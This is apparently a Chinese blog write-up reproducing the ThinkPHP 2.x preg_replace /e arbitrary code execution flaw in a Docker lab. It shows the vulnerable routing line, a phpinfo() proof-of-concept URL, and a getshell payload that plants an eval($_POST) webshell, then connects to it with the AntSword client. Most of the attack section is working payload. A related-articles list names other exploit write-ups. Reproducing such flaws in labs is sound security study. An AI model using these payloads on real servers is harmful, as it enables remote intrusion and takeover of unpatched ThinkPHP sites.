首页 > 编程语言 >ThinkPHP 2.x任意代码执行漏洞

ThinkPHP 2.x任意代码执行漏洞

时间:2023-08-28 17:02:01浏览次数:48  
标签:index 漏洞 代码执行 depr ThinkPHP 任意

ThinkPHP 2.x任意代码执行漏洞

原因:ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修护该漏洞,也存在这个漏洞。

环境搭建
执行如下命令启动ThinkPHP 2.1的Demo应用:

docker-compose up -d

环境启动后,访问http://your-ip:8080/Index/Index即可查看到默认页面。

漏洞复现
直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo():

img

img

利用该漏洞直接getshell

/index.php?s=a/b/c/${@print(eval($_POST[hack]))}

然后使用蚁剑连接
img

标签:index,漏洞,代码执行,depr,ThinkPHP,任意
From: https://www.cnblogs.com/kalixcn/p/17662791.html

相关文章

  • 基于Win32k内核提权漏洞的攻防对抗
    一、产生原因1.1Callback机制Win32k组件最初的设计和编写是完全建立的用户层上的,但是微软在WindowsNT4.0的改变中将Win32k.sys作为改变的一部分而引入,用以提升图形绘制性能并减少Windows应用程序的内存需求。窗口管理器(User)和图形设备接口(GDI)在极大程度上被移出客户端/......
  • CVE-2023-28432 MinIO 信息泄露漏洞
    MinIO简介MinIO是美国MinIO公司的一款开源的对象存储服务器,是一款高性能、分布式的对象存储系统.它是一款软件产品,可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过......
  • Weblogic远程代码执行漏洞CVE-2023-21839
    漏洞简介Oracle发布安全公告,修复了一个存在于WebLogicCore中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogicServer,成功利用该漏洞可能导致未授权访问和敏感信息泄露。影响版本OracleWeblogicServer12.2.1.3.......
  • Nacos漏洞总结
    Nacos简介Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。复现环境搭建本次复......
  • Acunetix v23.7 (Linux, Windows) - 漏洞扫描 (Web 应用程序安全测试)
    Acunetixv23.7(Linux,Windows)-漏洞扫描(Web应用程序安全测试)Acunetix|WebApplicationSecurityScanner请访问原文链接:https://sysin.org/blog/acunetix-23/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org重要提示AcunetixPremium现在使用日历化版本......
  • Nexpose v6.6.213 for Linux & Windows - 漏洞扫描
    Nexposev6.6.213forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseAug23,2023请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • Ruoyi框架漏洞复现总结
    若依管理系统简介若依管理系统(RuoyiAdminSystem)是一款基于Java开发的开源后台管理系统,旨在提供一个快速开发和部署企业级管理系统的解决方案。若依管理系统采用前后端分离架构,前端使用Vue.js框架,后端使用SpringBoot框架。复现环境搭建首先上若依官网下载源码,官网地址:https:/......
  • pikachu网站文件包含漏洞
    pikachu网站文件包含漏洞本地文件包含在PHPstudy配置文件中,将allow_url_include的状态打开:Off修改为On(本地主机可不修改allow_url_include)打开本地文件包含模块把file1.php改成1.php,报错出路径构造url(相对路径):加这么多…\是为了保证到达服务器的E盘根目录,可以看到读取是......
  • Black Hat USA 2023落幕回顾——安全AI成为关注焦点,漏洞利用衍生新议题。
    如何成为最跟得上潮流的黑客高手?  =ToDoList= 第一步:打开电脑的浏览器第二步:输入网址— blackhat.com跳转!第三步:阅读学习BlackHat2023的全部演讲 ……等等!这个BlackHat,是何方神圣?作为网络安全业界的“奥斯卡”黑帽大会BlackHat可谓是最知名的年度盛会这里......
  • smartbi token回调获取登录凭证漏洞
    2023年7月28日Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。于是研究了下相关补丁并进行分析。0x01分析结果依据补丁分析,得到如下漏洞复现步骤第一步,设置EngineAddress为攻击者机器上的http服务地址首先使用pythonflask......